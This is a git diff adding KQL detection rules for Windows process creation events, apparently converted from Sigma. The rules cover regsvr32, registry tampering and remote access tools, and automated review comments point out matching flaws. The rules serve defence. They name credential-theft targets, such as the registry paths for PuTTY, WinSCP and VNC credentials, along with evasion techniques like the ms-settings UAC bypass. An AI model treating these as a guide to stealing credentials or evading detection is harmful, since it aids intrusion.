b/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql @@ -0,0 +1,12 @@ +// Title: Regedit as Trusted Installer +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-27 +// Level: high +// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql new file mode 100644 index 00000000..d77ee3a0 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql @@ -0,0 +1,12 @@ +// Title: REGISTER_APP.VBS Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign + +DeviceProcessEvents +| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql b/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql new file mode 100644 index 00000000..3d9c14fc --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql 
@@ -0,0 +1,11 @@ +// Title: Registry Export of Third-Party Credentials +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-05-22 +// Level: high +// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials. +// Credential stealers have been known to use this technique to extract sensitive information from the registry. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (ProcessCommandLine contains "save" or ProcessCommandLine contains "export") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql new file mode 100644 index 00000000..6aed05d1 --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql @@ -0,0 +1,14 @@ +// Title: Registry Manipulation via WMI Stdregprov +// Author: Daniel Koifman (KoifSec) +// Date: 2025-07-30 +// Level: medium +// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class. +// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe. +// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "stdregprov") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql new file mode 100644 index 00000000..8e185f1f --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql 
@@ -0,0 +1,12 @@ +// Title: Registry Modification Attempt Via VBScript +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-08-13 +// Level: medium +// Description: Detects attempts to modify the registry using VBScript's CreateObject("Wscript.shell") and RegWrite methods via common LOLBINs. +// It could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell. +// Threat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "Wscript.shell" and ProcessCommandLine contains ".RegWrite" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql new file mode 100644 index 00000000..b4bd0d6c --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql 
@@ -0,0 +1,11 @@ +// Title: Registry Modification of MS-settings Protocol Handler +// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2021-12-20 +// Level: medium +// Description: Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence. +// Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001, attack.t1112 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-ItemProperty" or ProcessCommandLine contains "Set-ItemProperty" or ProcessCommandLine contains "ni " or ProcessCommandLine contains "sp ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll"))))) and ProcessCommandLine contains "\\ms-settings\\shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql b/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql new file mode 100644 index 00000000..eaafc645 --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Registry Modification Via Regini.EXE +// Author: Eli Salem, Sander Wiebing, oscd.community +// Date: 2020-10-08 +// Level: low +// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate modification of keys + +DeviceProcessEvents +| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql new file mode 100644 index 00000000..478e0a28 --- /dev/null +++ b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql 
@@ -0,0 +1,12 @@ +// Title: Regsvr32 DLL Execution With Suspicious File Extension +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2021-11-29 +// Level: high +// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql new file mode 100644 index 00000000..f3ffff0c --- /dev/null +++ b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql 
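Review bot: `ProcessCommandLine endswith ".bin"` (and the other twenty extension clauses) only matches when the extension is literally the last characters of the command line; in DeviceProcessEvents a quoted path argument ends with `"` and a trailing space is common, so those invocations fall through even though the DLL has a listed extension. This is a faithful translation of the Sigma `CommandLine|endswith` modifier, so the converter is not at fault, but the generated rule should say so for whoever tunes it: `// NOTE: endswith requires the extension to be the final characters of ProcessCommandLine; quoted or space-terminated arguments are not matched.` If closing that gap in KQL is preferred over an upstream change, `ProcessCommandLine matches regex @'(?i)\.(bin|bmp|cr2|dat|eps|gif|ico|jpeg|jpg|log|nef|orf|png|raw|rtf|sr2|temp|tif|tiff|tmp|txt)["'']?\s*$'` is the equivalent with an optional trailing quote, but that would be a deliberate divergence from the source rule and should be recorded as such in the header comment.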
@@ -0,0 +1,12 @@ +// Title: Regsvr32 DLL Execution With Uncommon Extension +// Author: Florian Roth (Nextron Systems) +// Date: 2019-07-17 +// Level: medium +// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution +// False Positives: +// - Other legitimate extensions currently not in the list either from third party or specific Windows components. + +DeviceProcessEvents +| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql new file mode 100644 index 00000000..3225331f --- /dev/null +++ b/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql 
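Review bot: The empty-command-line guard is spelled as `ProcessCommandLine =~ "" or isnull(ProcessCommandLine)`; KQL's `isempty()` already covers both null and the empty string, so the filter reads more clearly as `not(isempty(ProcessCommandLine) or ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx")`. The same two-clause form is emitted in the "Regsvr32 Execution From Highly Suspicious Location" hunk below, so this is a converter-level pattern worth changing once rather than per rule. Behaviour is unchanged either way; the point is readability of the generated output.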
@@ -0,0 +1,12 @@ +// Title: Regsvr32 Execution From Highly Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: high +// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or 
ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql new file mode 100644 index 00000000..b16dd95f --- /dev/null +++ b/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: Regsvr32 Execution From Potential Suspicious Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: medium +// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. + +DeviceProcessEvents +| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql new file mode 100644 index 00000000..d348e0b5 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - AnyDesk Execution +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql new file mode 100644 index 00000000..ac1ebac0 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql 
@@ -0,0 +1,14 @@ +// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-20 +// Level: high +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use of AnyDesk from a non-standard folder + +DeviceProcessEvents +| where ((FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (not((FolderPath contains "\\AppData\\" or FolderPath contains "Program Files (x86)\\AnyDesk" or FolderPath contains "Program Files\\AnyDesk"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql new file mode 100644 index 00000000..b52c3367 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql 
@@ -0,0 +1,15 @@ +// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate +// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-08 +// Level: medium +// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. +// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. +// Use this rule to detect instances of older versions of Anydesk using the compromised certificate +// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql new file mode 100644 index 00000000..1e41e786 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql 
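Review bot: `ProcessVersionInfoProductVersion startswith "8.0.1"` through `startswith "8.0.7"` are prefix tests, so they also match 8.0.10, 8.0.11 and any later two-digit patch level — versions that the description ("prior to 8.0.8") says are not affected — which would turn this rule into a false positive on up-to-date AnyDesk installs as soon as such versions are in use. A bounded test such as `ProcessVersionInfoProductVersion matches regex @"^8\.0\.[1-7](\.|$)"` (keeping the `7.0.` and `7.1.` prefixes as they are) matches exactly the listed range. If the same prefix list exists in the upstream Sigma rule the fix belongs there too, but the generated KQL is what gets deployed, so it should not ship with the open-ended match.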
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - AnyDesk Piped Password Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate piping of the password to anydesk
+// - Some FP could occur with similar tools that uses the same command line '--set-password'
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/c " and ProcessCommandLine contains "echo " and ProcessCommandLine contains ".exe --set-password"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql
new file mode 100644
index 00000000..527b59fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - AnyDesk Silent Installation
+// Author: Ján Trenčanský
+// Date: 2021-08-06
+// Level: high
+// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate deployment of AnyDesk
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--install" and ProcessCommandLine contains "--start-with-win" and ProcessCommandLine contains "--silent"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql
new file mode 100644
index 00000000..08db274e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - GoToAssist Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "GoTo Opener" or ProcessVersionInfoProductName =~ "GoTo Opener" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql
new file mode 100644
index 00000000..8cd185d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql
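Review bot: The third clause, `ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."`, is OR'd with the GoTo Opener checks, so any binary carrying that CompanyName satisfies this rule on its own; the "Remote Access Tool - LogMeIn Execution" hunk that follows uses the identical clause, so both rules fire for the same event whenever it is the CompanyName that matches. That is how the upstream Sigma rules are written, but the generated file should say so to save the analyst a puzzle: `// NOTE: the CompanyName clause matches any LogMeIn, Inc. product, so this rule and the LogMeIn Execution rule will alert together on such binaries.` If the maintainers want the two rules to stay distinct, the CompanyName test here would need to be ANDed with a GoTo-specific field rather than OR'd.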
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - LogMeIn Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "LMIGuardianSvc" or ProcessVersionInfoProductName =~ "LMIGuardianSvc" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
new file mode 100644
index 00000000..bad2e97c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
@@ -0,0 +1,13 @@ +// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral +// Author: @Kostastsale +// Date: 2024-09-22 +// Level: medium +// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. +// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host. + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\meshagent.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql new file mode 100644 index 00000000..93c2c113 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql 
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - NetSupport Execution
+// Author: frack113
+// Date: 2022-09-25
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "NetSupport Client Configurator" or ProcessVersionInfoProductName =~ "NetSupport Remote Control" or ProcessVersionInfoCompanyName =~ "NetSupport Ltd" or ProcessVersionInfoOriginalFileName =~ "PCICFGUI.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql
new file mode 100644
index 00000000..6612de57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Potential MeshAgent Execution - Windows
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql
new file mode 100644
index 00000000..390b946e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql
